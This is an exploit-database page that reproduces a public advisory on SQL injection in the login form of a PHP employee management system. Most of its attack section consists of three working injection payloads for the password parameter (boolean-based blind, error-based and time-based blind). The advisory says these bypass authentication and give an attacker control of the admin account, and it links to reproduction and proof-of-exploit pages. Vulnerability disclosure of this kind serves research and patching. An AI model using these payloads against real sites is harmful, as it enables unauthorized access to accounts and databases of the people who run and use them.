Advertisement






employee_akpoly-1.0-2024 Multiple-SQLi

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX Price not available High
Author Risk Exploitation Type Date
Not specified Critical Remote 2024-03-01
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030002

Below is a copy:

employee_akpoly-1.0-2024 Multiple-SQLi
## Title: employee_akpoly-1.0-2024 Multiple-SQLi
## Author: nu11secur1ty
## Date: 03/01/2024
## Vendor: https://www.sourcecodester.com/users/walterjnr1
## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
Potential SQLi detected in password parameter. Please confirm it manually... The payload from the puncher_SQLi_bypass_authentication module was submitted successfully after the test. You must test manually to confirm this vulnerability! By using this vulnerabilty the attacker
can get control against an admin account and evem more bad things!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: txtpassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT 2215=2215# TKHd&btnlogin=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT 2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT 3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)

## Time spend:
00:35:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum